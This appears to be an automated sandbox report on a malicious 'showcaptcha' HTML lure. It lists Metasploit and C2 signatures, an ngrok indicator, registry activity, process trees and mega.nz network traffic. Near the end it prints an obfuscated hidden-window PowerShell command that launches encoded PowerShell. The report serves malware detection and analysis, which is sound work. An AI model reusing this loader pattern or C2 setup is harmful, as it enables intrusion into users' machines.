Analysis Overview
SHA256
5934e81a30bd867068c77a66b807996d7fc35c3328e81865fce4190717e79214
Threat Level: Known bad
The file showcaptcha was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-17 15:47
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 15:47
Reported
2024-06-17 16:18
Platform
win10v2004-20240226-en
Max time kernel
1795s
Max time network
1802s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631128871173952" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=328 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.0.496467355\552327086" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1868 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0545262d-a97e-45fc-b56c-1b1488aa505e} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 1952 1e9f25dac58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.1.228310557\1411636788" -parentBuildID 20221007134813 -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c01249e-e5ef-490b-b291-7568b4811a38} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2360 1e9f23e5658 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.2.1928703970\1166002412" -childID 1 -isForBrowser -prefsHandle 3280 -prefMapHandle 3276 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99425484-831f-4665-a204-43e0ca8f5a22} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2912 1e9f255e758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.3.897746709\1463188637" -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2663c401-e8ef-466f-9bc7-735a976771fc} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 3632 1e9de961958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.4.1541525042\1617074344" -childID 3 -isForBrowser -prefsHandle 4712 -prefMapHandle 4708 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49c92963-38e8-495b-b716-9227dfc93e01} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4724 1e9f869f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.5.923604413\852831163" -childID 4 -isForBrowser -prefsHandle 5028 -prefMapHandle 4992 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d1de743-c17f-42ff-9ab5-a829b5ea0a09} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5004 1e9de930258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.6.1877094455\1239144281" -childID 5 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88af527e-c9ee-4c03-93f4-05bbf86f10c3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5304 1e9f5c34d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.7.999720461\477690942" -childID 6 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdde0178-3b42-4d8a-8e98-8495fec6c20a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5508 1e9de964158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.8.2011626743\1593798441" -childID 7 -isForBrowser -prefsHandle 4104 -prefMapHandle 2732 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f15d8e3-1aff-4d49-ae30-91d4aa148fd3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2884 1e9f85a9258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.9.1182793985\1244494078" -childID 8 -isForBrowser -prefsHandle 5812 -prefMapHandle 5824 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9f1c500-bfe0-4e17-a7bf-a120586cb7ef} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5820 1e9f4e4f558 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1348 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.10.1435694696\721073392" -childID 9 -isForBrowser -prefsHandle 4828 -prefMapHandle 4836 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af9360c2-7197-4fb3-845f-0467d2919707} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5172 1e9f9e2b958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.11.1985748577\43867022" -parentBuildID 20221007134813 -prefsHandle 5980 -prefMapHandle 6028 -prefsLen 26460 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa30e0e-c05b-4594-80f2-44c807e93ced} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5996 1e9fa10f658 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.12.2114010987\876774538" -childID 10 -isForBrowser -prefsHandle 5332 -prefMapHandle 5220 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50a54546-1d5a-40c9-9cd6-75fe3ddbdbe9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5908 1e9f5c65f58 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e8 0x4c0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.13.804170478\409992591" -childID 11 -isForBrowser -prefsHandle 6472 -prefMapHandle 6468 -prefsLen 27425 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4dc20bdc-2b11-4e54-bbaf-65a4c6622652} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6484 1e9f932cd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.14.455406405\527018596" -childID 12 -isForBrowser -prefsHandle 4908 -prefMapHandle 3316 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69a9cd44-0e8d-40d4-9660-61d56d69bbd6} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4784 1e9f9b9c458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.15.1005855958\1191682558" -childID 13 -isForBrowser -prefsHandle 6844 -prefMapHandle 6848 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9dbc297-2a64-478a-83ab-b489f1e6fd39} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5396 1e9fbf1bf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.16.467847512\853206893" -childID 14 -isForBrowser -prefsHandle 5088 -prefMapHandle 5140 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c44b810e-4aa0-4720-b836-bd9880edfd5a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6936 1e9f9eb3758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.17.1471832794\537484187" -childID 15 -isForBrowser -prefsHandle 5308 -prefMapHandle 4908 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08d21772-198c-454f-a54d-00153c56a1e9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5320 1e9f5c66558 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3276 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3296 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3832 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4844 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5040 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5496 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5764 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2224 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv TG -;sv rk ec;sv Sj ((gv TG).value.toString()+(gv rk).value.toString());powershell (gv Sj).value.toString() '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'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec 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
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec 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
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s24hl05a\s24hl05a.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB7C.tmp" "c:\Users\Admin\AppData\Local\Temp\s24hl05a\CSC6A726B40C104461BB2177FA8445EAB.TMP"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| US | 8.8.8.8:53 | 251.86.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| LU | 66.203.125.28:443 | reqstat.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.125.203.66.in-addr.arpa | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 202.35.99.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| LU | 66.203.125.56:443 | mcd270n310.karere.mega.nz | tcp |
| US | 8.8.8.8:53 | 56.125.203.66.in-addr.arpa | udp |
